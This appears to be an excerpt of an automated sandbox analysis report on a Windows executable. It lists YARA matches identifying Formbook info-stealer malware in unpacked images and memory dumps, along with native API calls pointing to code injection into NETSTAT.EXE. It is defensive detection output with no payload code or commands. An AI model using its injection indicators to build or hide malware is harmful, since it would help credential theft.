            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Fu94e0b1TR.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5D0640_2_00F5D064
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5F2960_2_00F5F296
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5F2980_2_00F5F298
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004010306_2_00401030
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041B9DA6_2_0041B9DA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041C2B06_2_0041C2B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00408C706_2_00408C70
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041BC206_2_0041BC20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00402D876_2_00402D87
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041C58D6_2_0041C58D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00402D906_2_00402D90
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041BE926_2_0041BE92
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00402FB06_2_00402FB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118F9006_2_0118F900
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01180D206_2_01180D20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A41206_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01251D556_2_01251D55
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B25816_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119D5E06_2_0119D5E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119841F6_2_0119841F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012410026_2_01241002
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119B0906_2_0119B090
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A06_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BEBB06_2_011BEBB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A6E306_2_011A6E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D66E3018_2_02D66E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7EBB018_2_02D7EBB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5B09018_2_02D5B090
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5841F18_2_02D5841F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E0100218_2_02E01002
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5D5E018_2_02D5D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E11D5518_2_02E11D55
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4F90018_2_02D4F900
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D40D2018_2_02D40D20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6412018_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DB9DA18_2_003DB9DA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DC2B018_2_003DC2B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DBC2018_2_003DBC20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C8C7018_2_003C8C70
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C2D9018_2_003C2D90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DC58D18_2_003DC58D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C2D8718_2_003C2D87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DBE9218_2_003DBE92
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C2FB018_2_003C2FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02D4B150 appears 32 times
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: String function: 0118B150 appears 35 times
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004185B0 NtCreateFile,6_2_004185B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00418660 NtReadFile,6_2_00418660
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004186E0 NtClose,6_2_004186E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00418790 NtAllocateVirtualMemory,6_2_00418790
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004185AA NtCreateFile,6_2_004185AA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004186DA NtClose,6_2_004186DA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041878A NtAllocateVirtualMemory,6_2_0041878A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_011C9910
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9540 NtReadFile,LdrInitializeThunk,6_2_011C9540
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C99A0 NtCreateSection,LdrInitializeThunk,6_2_011C99A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C95D0 NtClose,LdrInitializeThunk,6_2_011C95D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9840 NtDelayExecution,LdrInitializeThunk,6_2_011C9840
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9860 NtQuerySystemInformation,LdrInitializeThunk,6_2_011C9860
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C98F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_011C98F0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9710 NtQueryInformationToken,LdrInitializeThunk,6_2_011C9710
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9780 NtMapViewOfSection,LdrInitializeThunk,6_2_011C9780
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C97A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_011C97A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9FE0 NtCreateMutant,LdrInitializeThunk,6_2_011C9FE0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_011C9A00
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A20 NtResumeThread,LdrInitializeThunk,6_2_011C9A20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A50 NtCreateFile,LdrInitializeThunk,6_2_011C9A50
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_011C9660
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C96E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_011C96E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CAD30 NtSetContextThread,6_2_011CAD30
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9520 NtWaitForSingleObject,6_2_011C9520
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9950 NtQueueApcThread,6_2_011C9950
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9560 NtWriteFile,6_2_011C9560
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C99D0 NtCreateProcessEx,6_2_011C99D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C95F0 NtQueryInformationFile,6_2_011C95F0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9820 NtEnumerateKey,6_2_011C9820
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CB040 NtSuspendThread,6_2_011CB040
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C98A0 NtWriteVirtualMemory,6_2_011C98A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA710 NtOpenProcessToken,6_2_011CA710
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9B00 NtSetValueKey,6_2_011C9B00
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9730 NtQueryVirtualMemory,6_2_011C9730
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9770 NtSetInformationFile,6_2_011C9770
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA770 NtOpenThread,6_2_011CA770
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9760 NtOpenProcess,6_2_011C9760
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA3B0 NtGetContextThread,6_2_011CA3B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9610 NtEnumerateValueKey,6_2_011C9610
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A10 NtQuerySection,6_2_011C9A10
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9650 NtQueryValueKey,6_2_011C9650
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9670 NtQueryInformationProcess,6_2_011C9670
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A80 NtOpenDirectoryObject,6_2_011C9A80
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C96D0 NtCreateKey,6_2_011C96D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D896D0 NtCreateKey,LdrInitializeThunk,18_2_02D896D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D896E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_02D896E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89650 NtQueryValueKey,LdrInitializeThunk,18_2_02D89650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A50 NtCreateFile,LdrInitializeThunk,18_2_02D89A50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_02D89660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89FE0 NtCreateMutant,LdrInitializeThunk,18_2_02D89FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89780 NtMapViewOfSection,LdrInitializeThunk,18_2_02D89780
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89710 NtQueryInformationToken,LdrInitializeThunk,18_2_02D89710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89840 NtDelayExecution,LdrInitializeThunk,18_2_02D89840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89860 NtQuerySystemInformation,LdrInitializeThunk,18_2_02D89860
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D895D0 NtClose,LdrInitializeThunk,18_2_02D895D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D899A0 NtCreateSection,LdrInitializeThunk,18_2_02D899A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89540 NtReadFile,LdrInitializeThunk,18_2_02D89540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_02D89910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A80 NtOpenDirectoryObject,18_2_02D89A80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89670 NtQueryInformationProcess,18_2_02D89670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89610 NtEnumerateValueKey,18_2_02D89610
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A10 NtQuerySection,18_2_02D89A10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A00 NtProtectVirtualMemory,18_2_02D89A00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A20 NtResumeThread,18_2_02D89A20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8A3B0 NtGetContextThread,18_2_02D8A3B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D897A0 NtUnmapViewOfSection,18_2_02D897A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89770 NtSetInformationFile,18_2_02D89770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8A770 NtOpenThread,18_2_02D8A770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89760 NtOpenProcess,18_2_02D89760
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8A710 NtOpenProcessToken,18_2_02D8A710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89B00 NtSetValueKey,18_2_02D89B00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89730 NtQueryVirtualMemory,18_2_02D89730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D898F0 NtReadVirtualMemory,18_2_02D898F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D898A0 NtWriteVirtualMemory,18_2_02D898A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8B040 NtSuspendThread,18_2_02D8B040
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89820 NtEnumerateKey,18_2_02D89820
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D899D0 NtCreateProcessEx,18_2_02D899D0
